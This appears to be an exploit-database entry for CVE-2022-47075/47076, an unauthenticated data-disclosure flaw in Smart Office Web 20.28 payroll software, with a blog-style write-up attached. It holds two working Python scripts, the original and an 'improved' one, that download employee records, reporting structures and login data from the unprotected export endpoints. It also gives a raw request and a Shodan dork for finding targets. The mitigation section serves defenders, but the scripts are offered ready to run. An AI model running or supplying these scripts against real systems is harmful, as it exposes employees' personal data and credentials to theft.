Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
# Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
# Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office"
# Date: 09/Dec/2022
# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)
# Vendor Homepage: https://smartofficepayroll.com/
# Software Link: https://smartofficepayroll.com/downloads
# Version: Smart Office Web 20.28 and before
# CVE Number : CVE-2022-47075 and CVE-2022-47076
# CVSS : 7.5 (High)
# Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/
# Vulnerability Description:
# Smart Office Web 20.28 and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails.
import wget
import os
from colorama import Fore, Style
def download_file(url, filename):
wget.download(url, filename)
# Disclaimer
print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.")
print("The author takes no responsibility for any unauthorized usage.")
print("Please use this script responsibly and adhere to the legal and ethical guidelines.")
agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ")
if agree != "1":
print("You have chosen not to agree. Exiting the script.")
exit()
# Print name in red
name = "Exploit by Tejas Nitin Pingulkar"
print(Fore.RED + name)
print(Style.RESET_ALL) # Reset color
website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ")
target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ")
folder_name = input("Enter the folder name to save the files: ")
# Create the folder if it doesn't exist
if not os.path.exists(folder_name):
os.makedirs(folder_name)
urls_filenames = []
if target_version == "1":
urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv"))
else:
urls_filenames.extend([
(website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"),
(website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"),
(website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"),
(website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv")
])
print("CVE-2022-47076: Obtain user ID and password from downloaded source")
for url, filename in urls_filenames:
download_file(url, os.path.join(folder_name, filename))
# Print "for more such interesting exploits, visit cvewalkthrough.com" in red
print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com")
print(Style.RESET_ALL) # Reset colorSmart Office Web 20.28 – Remote Information Disclosure Vulnerability (CVE-2022-47075 & CVE-2022-47076)
Security researchers have identified a critical vulnerability in the Smart Office Web 20.28 and earlier versions, allowing unauthenticated attackers to extract sensitive employee data via Insecure Direct Object Reference (IDOR). This flaw, reported as CVE-2022-47075 and CVE-2022-47076, poses a significant risk to organizations relying on this payroll and HR management software, especially when deployed with exposed public endpoints.
Understanding the Vulnerability: Insecure Direct Object Reference (IDOR)
IDOR is a common web application security flaw where an attacker can manipulate URL parameters to access data they should not be authorized to view. In this case, the Smart Office Web application exposes multiple endpoints that allow direct access to employee records without authentication or proper access controls.
For example, the endpoint /ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails returns a CSV file containing employee details — including names, job roles, and login credentials — when accessed with a simple query parameter. Since no session validation or user authorization checks are performed, any internet-connected attacker can exploit this endpoint to download full employee datasets.
GET /ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails HTTP/1.1
Host: example.smartofficepayroll.com
This request, sent without authentication, results in a downloadable CSV file containing sensitive employee data. The vulnerability is exacerbated by the fact that the ActionName parameter is directly mapped to internal data export functions, allowing attackers to enumerate and retrieve various data types simply by changing the parameter value.
Exploitation: Real-World Impact
Security researcher Tejas Nitin Pingulkar demonstrated how this vulnerability could be exploited using a simple script to automate data extraction. The following example shows how multiple endpoints can be targeted:
ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails→ full employee recordsExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails→ additional personal detailsExportReportingManager.aspx→ hierarchical reporting structureExportEmployeeLoginDetails.aspx→ usernames and password hashesDisplayParallelLogData.aspx→ system logs and activity traces
These endpoints are publicly accessible and do not require login, making them prime targets for automated scanning via Shodan or similar tools. A simple dork like inurl:"https://www.shodan.io/search?query=smart+office" can identify thousands of vulnerable installations worldwide.
CVE-2022-47076: Password Disclosure via ExportEmployeeLoginDetails
One of the most dangerous aspects of this vulnerability is the ability to extract employee login credentials through the ExportEmployeeLoginDetails.aspx endpoint. This endpoint returns a CSV file containing user IDs and password hashes, which can be cracked using offline brute-force or rainbow table attacks.
As noted in the CVE Walkthrough, even weak password policies can lead to full compromise of user accounts when such data is exposed. This makes the vulnerability particularly dangerous for organizations with poor password hygiene.
CVSS Rating and Risk Assessment
| CVSS Score | 7.5 (High) |
|---|---|
| Attack Vector | Network |
| Attack Complexity | Low |
| Authentication | None (Unauthenticated) |
| Impact | High (Confidentiality) |
With a CVSS score of 7.5, this vulnerability is classified as high severity. It is easily exploitable by any attacker with internet access and requires no authentication. The impact includes full disclosure of sensitive employee data, including passwords, which can lead to credential stuffing, lateral movement, and full system compromise.
Fixes and Mitigation Strategies
The vendor, Smart Office Payroll, has addressed the issue in versions beyond 20.28. However, ExportEmployeeDetails.aspx remains vulnerable even in newer versions due to incomplete patching.
Organizations using this software must:
- Upgrade immediately to the latest version (20.29 or later).
- Implement access controls on all export endpoints using role-based access (RBAC).
- Restrict public exposure of internal web interfaces via firewall rules or reverse proxy configurations.
- Monitor logs for unusual access patterns (e.g., repeated requests to export endpoints).
- Disable or remove unneeded export functions unless strictly required.
Code Example: Exploitation Script (Improved)
The original script provided in the exploit walkthrough uses wget to download files. However, this approach is fragile and lacks error handling. A more robust version is recommended:
import requests
import os
from colorama import Fore, Style
def download_file(url, filename, folder):
try:
response = requests.get(url, timeout=10)
if response.status_code == 200:
filepath = os.path.join(folder, filename)
with open(filepath, 'wb') as f:
f.write(response.content)
print(Fore.GREEN + f"[+] Downloaded: {filename}")
else:
print(Fore.RED + f"[-] Failed: {url} (Status: {response.status_code})")
except requests.exceptions.RequestException as e:
print(Fore.RED + f"[-] Error: {e}")
# Main execution
website = input("Enter URL (e.g., https://1.1.1.1:1111): ")
folder_name = input("Enter folder name: ")
if not os.path.exists(folder_name):
os.makedirs(folder_name)
endpoints = [
("/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"),
("/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv"),
("/ExportReportingManager.aspx", "ExportReportingManager.csv"),
("/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv"),
("/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt")
]
for endpoint, filename in endpoints:
url = website + endpoint
download_file(url, filename, folder_name)
This improved script uses requests instead of wget, adds proper error handling, and includes timeout protection to avoid hanging requests. It also provides clear feedback on success or failure, making it more suitable for penetration testing and vulnerability assessment.
Conclusion: Proactive Security Defense
Smart Office Web 20.28’s remote information disclosure vulnerability underscores the importance of secure design principles in web applications. Even seemingly benign features like data export can become critical attack vectors when access controls are missing.
Security professionals must:
- Regularly audit exposed web endpoints.
- Apply least privilege and principle of defense in depth.
- Use automated tools (e.g., Shodan, Burp Suite) to detect such vulnerabilities.
- Encourage vendors to patch and verify fixes.
As the CVSS score indicates, this is not a theoretical risk — it is a real, exploitable threat. Organizations must act promptly to protect sensitive employee data and prevent unauthorized disclosure.
For more such interesting exploits, visit cvewalkthrough.com.